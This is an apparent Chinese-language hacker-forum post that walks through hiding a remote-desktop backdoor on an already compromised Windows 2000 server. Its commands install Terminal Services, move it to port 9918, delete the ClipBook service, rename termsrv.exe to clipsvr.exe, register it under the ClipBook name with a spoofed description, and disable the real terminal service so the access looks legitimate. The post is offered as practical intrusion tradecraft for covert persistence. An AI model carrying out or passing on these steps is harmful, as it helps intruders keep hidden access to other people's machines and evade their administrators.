作者:dkollf 來自:http://bbs.pysky.net

    不知道大家裝自己的后門的時候是怎么修改服務(wù)的，我記得曾經(jīng)有人說過，起服務(wù)名是一件需要藝術(shù)+技術(shù)的事，一個很垃圾的后門會因為你起的服務(wù)名而長久存活，而一個很好的后門會因為你的垃圾服務(wù)名而立馬掛掉，

修改后門經(jīng)驗談

    廢話不說了，就以我自己安裝終端服務(wù)為例來講講改服務(wù)的好處吧。

    這里我們要用到幾個工具，先介紹一下：

    3389.exe 這個不說了吧，地球人都知道

    tport.exe 這個也應(yīng)該知道，但是說一下，這個是改3389端口的

    serv.exe 服務(wù)管理程序，可以安裝、刪除、修改服務(wù)

    dtreg.exe CMD下的一個注冊表工具，和regedit差不多。

    開始，假設(shè)我們已經(jīng)控制了機器，是2kserver的，終端服務(wù)還沒開，讓我們來開吧

    3389.exe 1 #安裝終端，不重起

    tport.exe 9918 #修改端口

    net stop ClipSrv #-----------------|刪除次要服務(wù)

    serv.exe remove ClipSrv /y #-----------|為修改服務(wù)做準(zhǔn)備

    copy termsrv.exe clipsvr.exe #將終端的文件拷貝成和要取代的服務(wù)比較接近的名字

    serv.exe install ClipSrv /b:"%windir%\system32\clipsvr.exe" /n:"ClipBook" /i:yes /u:LocalSystem /s:auto #安裝成剛才刪除的服務(wù)

    dtreg.exe -Quiet -Set REG_SZ \HKLM\SYSTEM\CurrentControlSet\Services\ClipBook\Description=支持"剪貼簿查看器"，以便可以從遠(yuǎn)程剪貼簿查閱剪貼頁面，

電腦資料

    serv modify termservice /s:disabled #修改原先終端服務(wù)的狀態(tài)

    現(xiàn)在重起一次，你會發(fā)現(xiàn)終端服務(wù)已經(jīng)開啟，端口為9918,打開服務(wù)管理器你會發(fā)現(xiàn)終端服務(wù)已經(jīng)禁用了,進(jìn)程里也沒有termsrv.exe這個進(jìn)程,相對來說這個已經(jīng)很安全了，我一直也是用這中方式開終端，不知道其他人是不是這樣干的,大家可以交流一下，呵呵.